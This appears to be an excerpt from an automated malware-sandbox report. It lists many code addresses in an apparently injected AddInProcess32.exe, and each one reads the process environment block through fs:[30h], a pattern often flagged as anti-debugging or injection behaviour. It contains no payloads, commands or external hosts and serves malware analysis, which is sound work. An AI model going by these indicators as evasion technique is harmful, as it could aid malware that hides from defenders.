Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE3DB mov eax, dword ptr fs:[00000030h]	3_2_019FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F43D4 mov eax, dword ptr fs:[00000030h]	3_2_019F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F43D4 mov eax, dword ptr fs:[00000030h]	3_2_019F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0195A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019583C0 mov eax, dword ptr fs:[00000030h]	3_2_019583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019583C0 mov eax, dword ptr fs:[00000030h]	3_2_019583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019583C0 mov eax, dword ptr fs:[00000030h]	3_2_019583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019583C0 mov eax, dword ptr fs:[00000030h]	3_2_019583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D63C0 mov eax, dword ptr fs:[00000030h]	3_2_019D63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0196E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0196E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0196E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019863FF mov eax, dword ptr fs:[00000030h]	3_2_019863FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0C3CD mov eax, dword ptr fs:[00000030h]	3_2_01A0C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019603E9 mov eax, dword ptr fs:[00000030h]	3_2_019603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194C310 mov ecx, dword ptr fs:[00000030h]	3_2_0194C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A28324 mov eax, dword ptr fs:[00000030h]	3_2_01A28324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A28324 mov ecx, dword ptr fs:[00000030h]	3_2_01A28324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A28324 mov eax, dword ptr fs:[00000030h]	3_2_01A28324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A28324 mov eax, dword ptr fs:[00000030h]	3_2_01A28324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01970310 mov ecx, dword ptr fs:[00000030h]	3_2_01970310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198A30B mov eax, dword ptr fs:[00000030h]	3_2_0198A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198A30B mov eax, dword ptr fs:[00000030h]	3_2_0198A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198A30B mov eax, dword ptr fs:[00000030h]	3_2_0198A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov eax, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov eax, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov eax, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov ecx, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov eax, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D035C mov eax, dword ptr fs:[00000030h]	3_2_019D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F8350 mov ecx, dword ptr fs:[00000030h]	3_2_019F8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D2349 mov eax, dword ptr fs:[00000030h]	3_2_019D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F437C mov eax, dword ptr fs:[00000030h]	3_2_019F437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A2634F mov eax, dword ptr fs:[00000030h]	3_2_01A2634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1A352 mov eax, dword ptr fs:[00000030h]	3_2_01A1A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E284 mov eax, dword ptr fs:[00000030h]	3_2_0198E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E284 mov eax, dword ptr fs:[00000030h]	3_2_0198E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D0283 mov eax, dword ptr fs:[00000030h]	3_2_019D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D0283 mov eax, dword ptr fs:[00000030h]	3_2_019D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D0283 mov eax, dword ptr fs:[00000030h]	3_2_019D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019602A0 mov eax, dword ptr fs:[00000030h]	3_2_019602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019602A0 mov eax, dword ptr fs:[00000030h]	3_2_019602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov eax, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov ecx, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov eax, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov eax, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov eax, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E62A0 mov eax, dword ptr fs:[00000030h]	3_2_019E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0195A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0195A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0195A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0195A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0195A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A262D6 mov eax, dword ptr fs:[00000030h]	3_2_01A262D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019602E1 mov eax, dword ptr fs:[00000030h]	3_2_019602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019602E1 mov eax, dword ptr fs:[00000030h]	3_2_019602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019602E1 mov eax, dword ptr fs:[00000030h]	3_2_019602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194823B mov eax, dword ptr fs:[00000030h]	3_2_0194823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A250 mov eax, dword ptr fs:[00000030h]	3_2_0194A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956259 mov eax, dword ptr fs:[00000030h]	3_2_01956259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274 mov eax, dword ptr fs:[00000030h]	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D8243 mov eax, dword ptr fs:[00000030h]	3_2_019D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D8243 mov ecx, dword ptr fs:[00000030h]	3_2_019D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0A250 mov eax, dword ptr fs:[00000030h]	3_2_01A0A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0A250 mov eax, dword ptr fs:[00000030h]	3_2_01A0A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01954260 mov eax, dword ptr fs:[00000030h]	3_2_01954260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01954260 mov eax, dword ptr fs:[00000030h]	3_2_01954260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01954260 mov eax, dword ptr fs:[00000030h]	3_2_01954260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194826B mov eax, dword ptr fs:[00000030h]	3_2_0194826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A2625D mov eax, dword ptr fs:[00000030h]	3_2_01A2625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E59C mov eax, dword ptr fs:[00000030h]	3_2_0198E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01984588 mov eax, dword ptr fs:[00000030h]	3_2_01984588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01952582 mov eax, dword ptr fs:[00000030h]	3_2_01952582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01952582 mov ecx, dword ptr fs:[00000030h]	3_2_01952582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019745B1 mov eax, dword ptr fs:[00000030h]	3_2_019745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019745B1 mov eax, dword ptr fs:[00000030h]	3_2_019745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D05A7 mov eax, dword ptr fs:[00000030h]	3_2_019D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D05A7 mov eax, dword ptr fs:[00000030h]	3_2_019D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D05A7 mov eax, dword ptr fs:[00000030h]	3_2_019D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019565D0 mov eax, dword ptr fs:[00000030h]	3_2_019565D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0198A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0198A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E5CF mov eax, dword ptr fs:[00000030h]	3_2_0198E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E5CF mov eax, dword ptr fs:[00000030h]	3_2_0198E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0197E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019525E0 mov eax, dword ptr fs:[00000030h]	3_2_019525E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198C5ED mov eax, dword ptr fs:[00000030h]	3_2_0198C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198C5ED mov eax, dword ptr fs:[00000030h]	3_2_0198C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E6500 mov eax, dword ptr fs:[00000030h]	3_2_019E6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24500 mov eax, dword ptr fs:[00000030h]	3_2_01A24500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535 mov eax, dword ptr fs:[00000030h]	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E53E mov eax, dword ptr fs:[00000030h]	3_2_0197E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E53E mov eax, dword ptr fs:[00000030h]	3_2_0197E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E53E mov eax, dword ptr fs:[00000030h]	3_2_0197E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E53E mov eax, dword ptr fs:[00000030h]	3_2_0197E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197E53E mov eax, dword ptr fs:[00000030h]	3_2_0197E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01958550 mov eax, dword ptr fs:[00000030h]	3_2_01958550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01958550 mov eax, dword ptr fs:[00000030h]	3_2_01958550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198656A mov eax, dword ptr fs:[00000030h]	3_2_0198656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198656A mov eax, dword ptr fs:[00000030h]	3_2_0198656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198656A mov eax, dword ptr fs:[00000030h]	3_2_0198656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019844B0 mov ecx, dword ptr fs:[00000030h]	3_2_019844B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019DA4B0 mov eax, dword ptr fs:[00000030h]	3_2_019DA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0A49A mov eax, dword ptr fs:[00000030h]	3_2_01A0A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019564AB mov eax, dword ptr fs:[00000030h]	3_2_019564AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019504E5 mov ecx, dword ptr fs:[00000030h]	3_2_019504E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01988402 mov eax, dword ptr fs:[00000030h]	3_2_01988402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01988402 mov eax, dword ptr fs:[00000030h]	3_2_01988402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01988402 mov eax, dword ptr fs:[00000030h]	3_2_01988402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194C427 mov eax, dword ptr fs:[00000030h]	3_2_0194C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E420 mov eax, dword ptr fs:[00000030h]	3_2_0194E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E420 mov eax, dword ptr fs:[00000030h]	3_2_0194E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E420 mov eax, dword ptr fs:[00000030h]	3_2_0194E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6420 mov eax, dword ptr fs:[00000030h]	3_2_019D6420
